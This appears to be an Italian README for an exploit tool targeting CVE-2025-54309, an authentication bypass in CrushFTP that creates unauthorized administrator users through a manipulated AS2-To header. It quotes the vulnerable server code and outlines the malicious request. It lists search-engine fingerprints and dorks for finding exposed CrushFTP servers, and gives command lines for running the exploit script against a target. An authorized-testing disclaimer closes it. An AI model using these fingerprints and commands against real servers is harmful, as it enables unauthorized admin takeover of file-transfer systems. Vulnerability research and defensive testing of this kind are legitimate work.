
CrushFTP AS2 Bypass dell'autenticazione
CVE-2025-54309 è una vulnerabilità di bypass dell'autenticazione in CrushFTP che consente la creazione non autorizzata di utenti amministrativi attraverso la manipolazione dell'intestazione AS2.
crushftp/server/ServerSessionHTTP.javaloginCheckHeaderAuth() (riga 2285)} else if (this.headerLookup.containsKey("as2-to".toUpperCase())) {
if (this.headerLookup.getProperty("as2-to".toUpperCase()).trim().indexOf("-_-") < 0 && !ServerStatus.BG("blank_passwords")) {
return; // Authentication bypass occurs here
}
/WebInterface/function/ con intestazione AS2-To vuotasetUserItem nel corpo della richiesta-_- mancante nell'intestazione AS2-Tohttp.server_hash:525710691,-1319113083,2114359341,1401270286,-608770667http.favicon.hash:-1022206565"/WebInterface/w3c/p3p.xml"intitle:"CrushFTP WebInterface"inurl:"/WebInterface/login.html"python3 cve_2025_54309.py <target_url> [-u username] [-p password] [-v]
# Basic exploitation
python3 cve_2025_54309.py http://crushftp.example.com:8080
# Custom credentials
python3 cve_2025_54309.py https://crushftp.example.com -u kali -p kali1
# With login verification
python3 cve_2025_54309.py http://crushftp.example.com -v
Questo strumento è destinato esclusivamente a test di sicurezza autorizzati. Gli utenti sono responsabili del rispetto delle leggi e dei regolamenti applicabili.